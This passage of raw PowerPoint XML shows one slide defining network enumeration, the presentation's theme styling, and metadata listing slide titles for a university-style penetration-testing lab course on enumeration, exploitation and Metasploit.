                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="921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400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>In-depth analysis of targeted computers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Actively connecting to the target systems to identify user accounts, system accounts, services, and other useful information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3831326387"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Technic">
  <a:themeElements>
    <a:clrScheme name="Technic">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="3B3B3B"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D4D2D0"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="6EA0B0"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="CCAF0A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="8D89A4"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="748560"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="9E9273"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="7E848D"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00C8C3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="A116E0"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Technic">
      <a:majorFont>
        <a:latin typeface="Franklin Gothic Book"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
        <a:font script="Jpan" typeface="ＭＳ Ｐゴシック"/>
        <a:font script="Hang" typeface="HY견고딕"/>
        <a:font script="Hans" typeface="宋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HGｺﾞｼｯｸM"/>
        <a:font script="Hang" typeface="HY중고딕"/>
        <a:font script="Hans" typeface="黑体"/>
        <a:font script="Hant" typeface="微軟正黑體"/>
        <a:font script="Arab" typeface="Tahoma"/>
        <a:font script="Hebr" typeface="Levenim MT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chnic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</a:schemeClr>
            </a:gs>
            <a:gs pos="68000">
              <a:schemeClr val="phClr">
                <a:tint val="77000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="81000">
              <a:schemeClr val="phClr">
                <a:tint val="79000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="86000">
              <a:schemeClr val="phClr">
                <a:tint val="73000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:tint val="3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3000"/>
                <a:satMod val="150000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="25000">
              <a:schemeClr val="phClr">
                <a:tint val="96000"/>
                <a:shade val="80000"/>
                <a:satMod val="105000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="38000">
              <a:schemeClr val="phClr">
                <a:tint val="96000"/>
                <a:shade val="59000"/>
                <a:satMod val="120000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="55000">
              <a:schemeClr val="phClr">
                <a:shade val="57000"/>
                <a:satMod val="120000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="80000">
              <a:schemeClr val="phClr">
                <a:shade val="56000"/>
                <a:satMod val="145000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="88000">
              <a:schemeClr val="phClr">
                <a:shade val="63000"/>
                <a:satMod val="160000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:tint val="99555"/>
                <a:satMod val="155000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
        </a:gradFill>
      </a:fillStyleLst>
      <a:lnStyleLst>
        <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="phClr">
              <a:shade val="60000"/>
              <a:satMod val="30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</a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:glow rad="700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</a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:glow rad="762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  <a:scene3d>
            <a:camera prst="orthographicFront" fov="0">
              <a:rot lat="0" lon="0" rev="0"/>
            </a:camera>
            <a:lightRig rig="harsh" dir="t">
              <a:rot lat="6000000" lon="6000000" rev="0"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d contourW="10000" prstMaterial="metal">
            <a:bevelT w="20000" h="9000" prst="softRound"/>
            <a:contourClr>
              <a:schemeClr val="phClr">
                <a:shade val="30000"/>
                <a:satMod val="2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50000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="30000">
              <a:schemeClr val="phClr">
                <a:shade val="60000"/>
                <a:satMod val="150000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:tint val="83000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="13000000" scaled="0"/>
        </a:gradFill>
        <a:gradFill rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="78000"/>
                <a:satMod val="220000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="35000"/>
                <a:satMod val="155000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="60000" t="50000" r="4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Technic</Template>
  <TotalTime>28885</TotalTime>
  <Words>2584</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>540</Paragraphs>
  <Slides>51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7" baseType="lpstr">
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Technic</vt:lpstr>
      <vt:lpstr>CYBR644 – Cyber Practitioner Lab</vt:lpstr>
      <vt:lpstr>Overview of the course</vt:lpstr>
      <vt:lpstr>Project 1 Reminder</vt:lpstr>
      <vt:lpstr>Review</vt:lpstr>
      <vt:lpstr>Bug Bounties</vt:lpstr>
      <vt:lpstr>Where are we?</vt:lpstr>
      <vt:lpstr>Now we need an exploit</vt:lpstr>
      <vt:lpstr>Exploitation methods</vt:lpstr>
      <vt:lpstr>Enumeration</vt:lpstr>
      <vt:lpstr>Windows Enumeration</vt:lpstr>
      <vt:lpstr>Windows Enumeration cont.</vt:lpstr>
      <vt:lpstr>Windows Security</vt:lpstr>
      <vt:lpstr>Windows Security cont.</vt:lpstr>
      <vt:lpstr>NetBIOS Enumeration Tools</vt:lpstr>
      <vt:lpstr>Enumeration Tools</vt:lpstr>
      <vt:lpstr>Simple Network Management Protocol (SNMP) Enumeration</vt:lpstr>
      <vt:lpstr>Linux and UNIX Enumeration</vt:lpstr>
      <vt:lpstr>NTP Enumeration</vt:lpstr>
      <vt:lpstr>SMTP Enumeration</vt:lpstr>
      <vt:lpstr>DNS Enumeration</vt:lpstr>
      <vt:lpstr>Break</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Finding Exploits</vt:lpstr>
      <vt:lpstr>Public Exploits</vt:lpstr>
      <vt:lpstr> H@x0r underground</vt:lpstr>
      <vt:lpstr>Commercial Exploit Frameworks</vt:lpstr>
      <vt:lpstr>C2 Frameworks</vt:lpstr>
      <vt:lpstr>MEtasploit</vt:lpstr>
      <vt:lpstr>MEtasploit</vt:lpstr>
      <vt:lpstr>MEtasploit</vt:lpstr>
      <vt:lpstr>MEtasploit</vt:lpstr>
      <vt:lpstr>MEtasploit</vt:lpstr>
      <vt:lpstr>MEtasploit</vt:lpstr>
      <vt:lpstr>MEtasploit</vt:lpstr>
      <vt:lpstr>MEtasploit</vt:lpstr>
      <vt:lpstr>MEtasploit</vt:lpstr>
      <vt:lpstr>Metasploit &amp; Databases &amp; Nmap</vt:lpstr>
      <vt:lpstr>Metasploit port scanning</vt:lpstr>
      <vt:lpstr>Metasploit and nessus</vt:lpstr>
      <vt:lpstr>Vulnerability scanning with metasploit</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Metasploit GUI?</vt:lpstr>
      <vt:lpstr>Armitage</vt:lpstr>
      <vt:lpstr>Covering Tracks</vt:lpstr>
      <vt:lpstr>Perspectives</vt:lpstr>
      <vt:lpstr>Perspectives</vt:lpstr>
      <vt:lpstr>Perspectives</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Lab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Forensics 909</dc:title>
  <dc:creator>Michael Hennick</dc:creator>
  <cp:lastModifiedBy>Michael Hennick</cp:lastModifiedBy>
  <cp:revision>119</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-01-03T00:04:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-06T23:01:19Z</dcterms:modified>
</cp:coreProperties>
</file>